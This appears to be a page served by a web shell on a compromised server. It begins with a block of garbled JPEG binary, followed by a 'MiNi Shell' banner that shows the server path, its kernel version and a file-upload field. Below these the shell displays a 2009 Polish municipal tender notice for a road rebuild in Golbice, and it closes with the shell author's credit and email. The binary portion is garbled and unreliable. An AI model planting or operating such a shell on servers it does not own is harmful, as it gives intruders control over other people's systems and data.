JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090318/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090318/67418-N-2009.html

<p class="kh_header"><b>Grabów: Przebudowa drogi w miejscopwości Golbice długości 1,67 km</b><br>
<b>Numer ogłoszenia: 67418 - 2009; data zamieszczenia: 18.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Grabów , ul. 1 Maja 21, 99-150 Grabów, woj. łódzkie, tel. 063 2734121, faks 063 2734373.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.grabow,com.pl     lub   www.grabow.bipst.pl  lub</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi w miejscopwości Golbice długości 1,67 km.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonanie następujących robót.
- roboty przygotowawcze, pomiarowe
- uzupełnienie istniejącej  podbudowy z mieszanki kamiennej 0-31,5 mm grubość po  
  zagęszczeniu 5 cm pow.6825 m2 
- wykonanie nawierzchni z betonu asfaltowego dla KR-1 grubości po zagęszczeniu 4 cm pow.6360 m2
- roboty wykończeniowe i oznakowanie
2.	Szczegółowy opis przedmiotu zamówienia zawarty jest w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót- załącznik nr 1 do SIWZ oraz w kosztorysie nakładczym wskazującym potrzebne nakłady: materiałów, sprzętu i robocizny sporządzone na podstawie KNR, będący załącznikiem do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące warunki:
1.	spełniają wymogi określone w art. 22 ust 1 ustawy Prawo zamówienia  publicznego .
2.	wykonali roboty w okresie ostatnich 5 lat o charakterze podobnym do przedmiotu zamówienia i przedłożą dokumenty potwierdzające należyte wykonanie min. trzy dokumenty
3.	posiadają odpowiedni kapitał dla wykonania tego zamówienia tj. środki własne, dostępność do innych źródeł finansowania lub zdolność kredytową co najmniej 200 tys. zł potwierdzone opinią banku
4.	udzielą gwarancji na min. 3 lata
5.	posiadają aktualne ubezpieczenie od odpowiedzialności cywilnej w zakresie  prowadzenia działalności gospodarczej na nie mniej niż 200tys. zł.
6.	nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych
7.	spełnią pozostałe wymagania określone SIWZ.
Ocena spełnienia w/w warunków  dokonana zostanie zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w dokumentach i załączonych oświadczeniach, z treści załączonych dokumentów musi wynikać jednoznacznie, iż  warunki spełnił. Niespełnienie chociażby jednego z  warunków skutkować będzie wykluczeniem wykonawcy z postępowania.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.wypełniony i podpisany formularz oferty wg. załącznika nr 2.
  2. projekt umowy parafowany przez  oferenta na każdej stronie wg. załącznika Nr 9
  3. oświadczenie wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy  
     Prawo zamówień publicznych i spełnia warunki określone w art. 22 ust. 1 wskazanej ustawy  wg.  
     załącznika Nr. 8.
4. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  działalności  
    gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji  
    działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu   
     składania  ofert 
 5. aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego  
     organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24  
     ust.1 pkt. 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania  
     ofert.
    6.  aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt. 9  
    ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.. 
     7.   aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału   
          Zakładu   Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego    
          potwierdzająca   odpowiednio, że oferent nie zalega z opłatami podatku, opłat oraz składek na    
          ubezpieczenie zdrowotne   lub społeczne, zaświadczenie, że uzyskał przewidziane prawem    
          zwolnienie, odroczenie lub rozłożenie  na raty zaległych płatności lub wstrzymanie w całości  
          wykonania decyzji  właściwego organu,  wystawione nie wcześniej niż 3 m-ce przed upływem  
           terminu składania ofert.
    8.   informacje na temat przeciętnej liczby zatrudnionych pracowników oraz liczebności personelu   
  kierowniczego, w okresie ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności jest    
  krótszy - w tym okresie wg załącznika 5
    9.  Wykaz osób , które będą wykonywać zamówienie lub będą uczestniczyć w wykonaniu zamówienia wraz    
         z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, tj. posiadających  
         uprawnienia budowlane wymagane przepisami ustawy Prawo Budowlane, wpisanych na listę członków   
        właściwej okręgowej Izby Inżynierów Budownictwa do kierowania robotami budowlanymi w  
        specjalności  drogownictwa wg załącznika nr. 6
  10. wykaz wykonanych w okresie ostatnich pięciu lat robót budowlanych, a jeżeli okres prowadzenia   
        działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom   
        budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca   
         wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie,   
        poprzez zamówienie  odpowiadające swoim rodzajem, co przedmiot zamówienia należy rozumieć  
        wybudowanie co najmniej trzech  dróg  o podobnych parametrach.wg załącznika nr.7
 11.  informacja banku, w którym wykonawca posiada podstawowy rachunek bankowy, potwierdzająca   
   wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy - na kwotę nie  
   mniejszą niż 200.000,0 zł., wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu 
   składania ofert
  12.  polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od  
         odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na wartości nie mniejszą   
         niż 200.000,00 zł
  13.  oświadczenie o udzielenie gwarancji na min. 3 lata
14	harmonogram robót rzeczowo-finansowy w układzie miesięcznym jako  projekt realizacji  
      inwestycji  wg załącznika nr. 4.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.grabow.com.pl  lub www.grabowbipst.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Grabowie ul. 1-go Maja 21  99-150 Grabów  pokój nr 14 w godz. od 9:00 do 14:00.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2009 godzina 10:00, miejsce: Urząd Gminy w Grabowie ul. 1-go Maja 21 99-150 Grabów  w pokoju nr 3.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com